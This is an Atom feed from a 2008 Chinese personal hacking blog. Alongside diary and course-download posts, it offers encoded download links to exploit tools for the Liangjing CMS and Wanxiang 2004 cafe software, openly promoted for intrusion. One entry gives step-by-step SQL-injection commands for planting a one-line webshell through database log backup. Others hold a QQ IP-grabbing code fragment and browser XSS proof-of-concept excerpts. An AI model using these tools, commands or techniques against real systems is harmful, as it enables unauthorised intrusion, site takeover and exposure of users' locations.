<?php xml version="1.0" encoding="UTF-8"?> 
<feed xmlns="http://www.w3.org/2005/Atom">
<title type="html"><![CDATA[天晴軒·無名閣]]></title>
<subtitle type="html"><![CDATA[蓝色的天空下 是我那比白开水还要淡的生活]]></subtitle>
<id>http://popphen.net.ru</id> 
<link rel="alternate" type="text/html" href="http://popphen.net.ru" /> 
<link rel="self" type="application/atom+xml" href="http://popphen.net.ruatom.php" /> 
<generator uri="http://www.f2blog.com/" version="1.2 build 03.01">F2Blog</generator> 
<updated>2008-06-30 11:26:47</updated> 
<entry>
  <title type="html"><![CDATA[暑假了]]></title>
  <author>
	 <name>天晴无名氏</name>
	 <uri>http://popphen.net.rurewrite.php/read-486.html</uri>
	 <email>tqwms@vip.qq.com</email>
  </author>
  <category term="" scheme="http://popphen.net.rurewrite.php/category-8.html" label="Diary" /> 
  <updated>2008-06-30 11:26:47</updated>
  <published>2008-06-30 11:26:47</published>
  <content type='text'><![CDATA[暑假了 又是跟大家说暑假的事情了<br /> 博客因为去年暑假至今可以说事一蹶不振<br /> 唉 访问量在也没有像去年暑假以前那样突破日ip600了<br /> 很是心疼 ..<br /> 今天下午2点的车明天早上5点到<br /> 无座运气好的话 或许半途有人下车<br /> 祝我好运吧<br /> 博客已经设置每晚12点以后自动备份<br /> 并发送到我的邮箱 因此数据已经确保不会丢失了<br /><br /> 可能暑假会更新较慢的 没办法了&nbsp;]]></content>
  <link rel="alternate" type="text/html" href="http://popphen.net.rurewrite.php/read-486.html" /> 
  <id>http://popphen.net.rurewrite.php/read-486.html</id> 
</entry>	
<entry>
  <title type="html"><![CDATA[良精企业网站管理系统漏洞利用工具]]></title>
  <author>
	 <name>天晴无名氏</name>
	 <uri>http://popphen.net.rurewrite.php/read-485.html</uri>
	 <email>tqwms@vip.qq.com</email>
  </author>
  <category term="" scheme="http://popphen.net.rurewrite.php/category-12.html" label="Soft" /> 
  <updated>2008-06-30 11:09:16</updated>
  <published>2008-06-30 11:09:16</published>
  <content type='text'><![CDATA[<p><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="405" height="325"><param name="movie" value="http://f.yupoo.com/v.swf?id=popphen-ff8080811ac37541011ad76da37e0230-m" /><param name="quality" value="high" /><param name="menu" value="false" /><param name="wmode" value="" /></object>&nbsp;<br /> 良精企业网站管理系统漏洞利用工具，可以更简单的寻找漏洞，进行入侵。<br /><!--more--></p><div id="x">迅雷地址：<br /><font color="#ff0000">thunder://QUFodHRwOi8vZG93bmxvYWQuNzcxNjkuY29tL3NvZnQvaGFjcmt0b29scy9hdHRhY2svMjAwODA2LzIwMDgwNjMwbGlhbmdqaW5nRVhQdG9vbC56aXBaWg==</font><br /><br /> 快车地址：<br /><font color="#ff0000">flashget://W0ZMQVNIR0VUXWh0dHA6Ly9kb3dubG9hZC43NzE2OS5jb20vc29mdC9oYWNya3Rvb2xzL2F0dGFjay8yMDA4MDYvMjAwODA2MzBsaWFuZ2ppbmdFWFB0b29sLnppcFtGTEFTSEdFVF0=&amp;abc</font></div>]]></content>
  <link rel="alternate" type="text/html" href="http://popphen.net.rurewrite.php/read-485.html" /> 
  <id>http://popphen.net.rurewrite.php/read-485.html</id> 
</entry>	
<entry>
  <title type="html"><![CDATA[万象2004终结者]]></title>
  <author>
	 <name>天晴无名氏</name>
	 <uri>http://popphen.net.rurewrite.php/read-484.html</uri>
	 <email>tqwms@vip.qq.com</email>
  </author>
  <category term="" scheme="http://popphen.net.rurewrite.php/category-12.html" label="Soft" /> 
  <updated>2008-06-30 11:06:59</updated>
  <published>2008-06-30 11:06:59</published>
  <content type='text'><![CDATA[&nbsp;<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="426" height="314"><param name="movie" value="http://f.yupoo.com/v.swf?id=popphen-ff8080811ac37541011ad76da3f10231-m" /><param name="quality" value="high" /><param name="menu" value="false" /><param name="wmode" value="" /></object><br /> 万象2004终结者是目前最综合的利用万象2004各种漏洞的利用工具。<br /><!--more--><br /><div id="x">迅雷地址：<br /><font color="#ff0000">thunder://QUFodHRwOi8vZG93bmxvYWQuNzcxNjkuY29tL3NvZnQvaGFjcmt0b29scy9hdHRhY2svMjAwODA2LzIwMDgwNjMwd3gyMDA0cWdtbGtseS56aXBaWg==</font><br /><br /> 快车地址：<br /><font color="#ff0000">flashget://W0ZMQVNIR0VUXWh0dHA6Ly9kb3dubG9hZC43NzE2OS5jb20vc29mdC9oYWNya3Rvb2xzL2F0dGFjay8yMDA4MDYvMjAwODA2MzB3eDIwMDRxZ21sa2x5LnppcFtGTEFTSEdFVF0=&amp;abc</font></div>]]></content>
  <link rel="alternate" type="text/html" href="http://popphen.net.rurewrite.php/read-484.html" /> 
  <id>http://popphen.net.rurewrite.php/read-484.html</id> 
</entry>	
<entry>
  <title type="html"><![CDATA[LiteIM/FreePlus的取IP代码]]></title>
  <author>
	 <name>天晴无名氏</name>
	 <uri>http://popphen.net.rurewrite.php/read-483.html</uri>
	 <email>tqwms@vip.qq.com</email>
  </author>
  <category term="" scheme="http://popphen.net.rurewrite.php/category-6.html" label="Articles" /> 
  <updated>2008-06-30 10:57:24</updated>
  <published>2008-06-30 10:57:24</published>
  <content type='text'><![CDATA[<div id="NewaspContentLabel" class="ContentFont" style="padding-right: 10px; display: block; padding-left: 10px; padding-bottom: 0px; padding-top: 0px"><font style="font-size: 14px; font-family: 宋体, Verdana, Arial, Helvetica, sans-serif" id="font_word"><p>随着珊瑚虫被TX镇压后 飘云 虫虫 Freeplus等陆续退出QQ 外挂(辅助工具)的行列 并发出关键代码<br /> 随后的QQ显ip去广告等版本都是基于这些出来的 如:功夫QQ2008显ip版 飘云2008贺岁版显ip去广告 腾讯QQ2008 (显IP显隐身) 传美版 腾讯QQ彩虹显IP显隐身包括一些qq显ip显隐身最新版本|qq显ip显隐身最新版本|腾讯qq显ip显隐身下载|最新qq显ip显隐身|qq显ip显隐身版下载|qq显ip显隐身超级版 |腾讯qq显ip显隐身版|qq显ip显隐身补丁|qq显ip显隐身版|传美qq显ip显隐身|腾讯qq显ip显隐身 等等<br /> QQ2008贺岁版显IP显隐身|珊瑚虫|传美|飘云|Fineplus|功夫|狂人|下载<br /><br /> 这是LiteIM/FreePlus的取IP代码,感兴趣的朋友看看吧.<br /> runjin的是汇编版本,这是c版本,希望有更多的人能读懂.后来者,愿它对你有益.闪了.<br /> 源码：</p><div>static const DWORD UnknownSig=0x1E3A86BA;<br /> static const LPSTR szQQUSER_DYNAMIC_DATA=&quot;QQUS</div></font></div>]]></content>
  <link rel="alternate" type="text/html" href="http://popphen.net.rurewrite.php/read-483.html" /> 
  <id>http://popphen.net.rurewrite.php/read-483.html</id> 
</entry>	
<entry>
  <title type="html"><![CDATA[WINDOWS SERVER 2003AD域从入门到精通（全集）北大清鸟讲师编精品]]></title>
  <author>
	 <name>天晴无名氏</name>
	 <uri>http://popphen.net.rurewrite.php/read-482.html</uri>
	 <email>tqwms@vip.qq.com</email>
  </author>
  <category term="" scheme="http://popphen.net.rurewrite.php/category-10.html" label="Resources" /> 
  <updated>2008-06-29 21:03:43</updated>
  <published>2008-06-29 21:03:43</published>
  <content type='text'><![CDATA[<p>WINDOWS SERVER 2003从入门到精通之组策略应用</p><p>WINDOWS SERVER 2003从入门到精通之在AD中创建子域和域树</p><p>WINDOWS SERVER 2003从入门到精通之使用证书在WEB服务器上设置SSL(上)<!--more--></p><p>WINDOWS SERVER 2003从入门到精通之使用证书在WEB服务器上设置SSL(下)</p> WINDOWS SERVER 2003从入门到精通之使用IIS服务配置WEB站点 <p>WINDOWS SERVER 2003从入门到精通之配置DHCP服务器(上)</p><p>WINDOWS SERVER 2003从入门到精通之配置DHCP服务器(下)</p><p>WINDOWS SERVER 2003从入门到精通之林之间的信任关系</p><p>WINDOWS SERVER 2003从入门到精通之活动目录数据库的维护</p><p>WINDOWS SERVER 2003从入门到精通之创建Windows域</p><p>WINDOWS SERVER 2003从入门到精通之NTFS特性</p><p>WINDOWS SERVER 2003从入门到精通之DHCP中继代理</p><p>WINDOWS SERVER 2003从入门到精通之AD中的5种操作主机<br /><br /><br /><br /><img src="http://popphen.net.ruimages/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/><a href="http://popphen.net.rudownload.php?id=29">点此下载.rar</a>&nbsp;(0 Byte , 下载:16次)</p>]]></content>
  <link rel="alternate" type="text/html" href="http://popphen.net.rurewrite.php/read-482.html" /> 
  <id>http://popphen.net.rurewrite.php/read-482.html</id> 
</entry>	
<entry>
  <title type="html"><![CDATA[世界之窗等浏览器本地xss跨域漏洞POC]]></title>
  <author>
	 <name>天晴无名氏</name>
	 <uri>http://popphen.net.rurewrite.php/read-481.html</uri>
	 <email>tqwms@vip.qq.com</email>
  </author>
  <category term="" scheme="http://popphen.net.rurewrite.php/category-6.html" label="Articles" /> 
  <updated>2008-06-29 00:28:26</updated>
  <published>2008-06-29 00:28:26</published>
  <content type='text'><![CDATA[<div class="\&quot;storycontent\&quot;"><p>漏洞说明：http://www.80sec.com/360-sec-browser-localzone-xss.html</p><p>文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt</p><p>漏洞分析：世界之窗浏览器在起始页面是以res://E:\\PROGRA~1\\THEWOR~1.0\\languages\\chs.dll/TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏洞，简单分析如下：</p><br /><br />&lt;script language=&quot;JavaScript&quot;&gt;<br />var nOldCount = 0;<br />for( i = 0; i &lt; g_nCountOld; i ++ )<br />{<br />str_url = g_arr_argUrlOld[i];<br />str_name = g_arr_argNameOld[i];
<p>str_td = “&lt;tr ID=’twOldItem” + i +”‘&gt;&lt;td v</p></div>]]></content>
  <link rel="alternate" type="text/html" href="http://popphen.net.rurewrite.php/read-481.html" /> 
  <id>http://popphen.net.rurewrite.php/read-481.html</id> 
</entry>	
<entry>
  <title type="html"><![CDATA[不知道为什么发生错误 排查中...]]></title>
  <author>
	 <name>天晴无名氏</name>
	 <uri>http://popphen.net.rurewrite.php/read-480.html</uri>
	 <email>tqwms@vip.qq.com</email>
  </author>
  <category term="" scheme="http://popphen.net.rurewrite.php/category-8.html" label="Diary" /> 
  <updated>2008-06-28 02:16:13</updated>
  <published>2008-06-28 02:16:13</published>
  <content type='text'><![CDATA[<p>不知道为什么发生错误 排查中...<br /><br /> 故障已经找到 没问题了</p>]]></content>
  <link rel="alternate" type="text/html" href="http://popphen.net.rurewrite.php/read-480.html" /> 
  <id>http://popphen.net.rurewrite.php/read-480.html</id> 
</entry>	
<entry>
  <title type="html"><![CDATA[DBO权限日志备份专用一句话木马]]></title>
  <author>
	 <name>天晴无名氏</name>
	 <uri>http://popphen.net.rurewrite.php/read-478.html</uri>
	 <email>tqwms@vip.qq.com</email>
  </author>
  <category term="" scheme="http://popphen.net.rurewrite.php/category-6.html" label="Articles" /> 
  <updated>2008-06-28 02:04:40</updated>
  <published>2008-06-28 02:04:40</published>
  <content type='text'><![CDATA[<strong>备分专用一句话</strong><p>　　加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.</p><p>　<strong>　日志备分WEBSHELL标准的七步:</strong></p><p>　　1.InjectionURL&rsquo;;alter database XXX set RECOVERY FULL-- (把sql设置成日志完全恢复模式)</p><p>　　2.InjectionURL&rsquo;;create table cmd (a image)-- (新建立一个cmd表)</p><p>　　3.InjectionURL&rsquo;;backup log XXX to disk = &rsquo;c:\cmd&rsquo; with init-- (减少备分数据的大小)</p><p>　　4.InjectionURL&rsquo;;insert into cmd (a) values (&rsquo;&quot;的16进制字符插入到表中</p><p>　　4、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=&rsquo;C:\Program Files\Co</p>]]></content>
  <link rel="alternate" type="text/html" href="http://popphen.net.rurewrite.php/read-478.html" /> 
  <id>http://popphen.net.rurewrite.php/read-478.html</id> 
</entry>	
<entry>
  <title type="html"><![CDATA[360安全浏览器本地xss跨域漏洞]]></title>
  <author>
	 <name>天晴无名氏</name>
	 <uri>http://popphen.net.rurewrite.php/read-477.html</uri>
	 <email>tqwms@vip.qq.com</email>
  </author>
  <category term="" scheme="http://popphen.net.rurewrite.php/category-6.html" label="Articles" /> 
  <updated>2008-06-25 12:07:19</updated>
  <published>2008-06-25 12:07:19</published>
  <content type='text'><![CDATA[<div class="storycontent"><p>产品官方：360安全浏览器是全球首款采用&ldquo;沙箱&rdquo;技术的浏览器，能够彻底避免木马病毒从网页上对你的计算机发起攻击。360安全浏览器完全突破了传统的以查杀、拦截为核心的安全思路，在计算机系统内部构造了一个独立的虚拟空间&mdash;&mdash;&ldquo;360沙箱&rdquo;，使所有网页程序都密闭在此空间内运行。因此，网页上任何木马、病毒、恶意程序的攻击都会被限制在&ldquo;360沙箱&rdquo;中，无法对真实的计算机系统产生破坏，真正做到百毒不侵。<br /> 360安全浏览器只有1.6M，小巧轻快、功能丰富，适合快速安装。除独家采用的&ldquo;沙箱&rdquo;技术外，360安全浏览器还集成了恶意代码智能拦截、下载文件即时扫描、恶意网站自动报警，广告窗口智能过滤等强劲功能，是目前市面上最安全的浏览器。</p><p>漏洞成因：360在软件被关闭时，如果有未关闭的标签，为了实现用户友好，该标签会在360的起始页面中被显示出来，但是360浏览器在处理用户输入上存在一点问题，导致软件中产生一个跨站脚本漏洞。该跨站脚本漏洞运行的上下文是在res://协议中，也就是在本地域中，所以</p></div>]]></content>
  <link rel="alternate" type="text/html" href="http://popphen.net.rurewrite.php/read-477.html" /> 
  <id>http://popphen.net.rurewrite.php/read-477.html</id> 
</entry>	
<entry>
  <title type="html"><![CDATA[第三方浏览器安全警告]]></title>
  <author>
	 <name>天晴无名氏</name>
	 <uri>http://popphen.net.rurewrite.php/read-476.html</uri>
	 <email>tqwms@vip.qq.com</email>
  </author>
  <category term="" scheme="http://popphen.net.rurewrite.php/category-6.html" label="Articles" /> 
  <updated>2008-06-25 12:03:06</updated>
  <published>2008-06-25 12:03:06</published>
  <content type='text'><![CDATA[<div class="storycontent"><p>漏洞警告：通过对微软浏览器IE6跨域漏洞的深入研究，我们发现实际上即使在安装了IE7浏览器的操作系统中，也一样存在类似的问题。这个漏洞并不单独存在于IE6中，而是存在于微软提供的浏览器接口中。在微软提供的浏览器内核接口中存在的一个尚未被修补的安全问题，导致所有在IE内核Trident基础上开发的第三方浏览器都存在一个安全漏洞，可能导致跨域的一些操作，在特定的浏览器平台上甚至可以导致远程代码执行。我们建议有高安全性要求的用户暂时还是使用oprea，Firefox等浏览器，避免一些第三方浏览器给您带来损失。</p><p>漏洞说明：在和一些技术人员讨论之后可以看到，IE7并没有全新地在内核层次做太多变动，更多的是在IE7本身里Trident内核外围做了一些改动，这导致一些IE7很好的安全特性和修补的安全漏洞并没有遗传给那些使用IE内核的浏览器，因为它们本质上还是使用的系统的IE内核，而不是在外围做了改动的IE7。<br /> 一般的浏览器结构都是浏览器外壳+浏览器内核，rident是IE采用的内核心解析引擎，负责处理页面的渲染和javascript的执行。老的IE内核即Trident在几个方面对于第三方浏览器带来的威</p></div>]]></content>
  <link rel="alternate" type="text/html" href="http://popphen.net.rurewrite.php/read-476.html" /> 
  <id>http://popphen.net.rurewrite.php/read-476.html</id> 
</entry>	
</feed>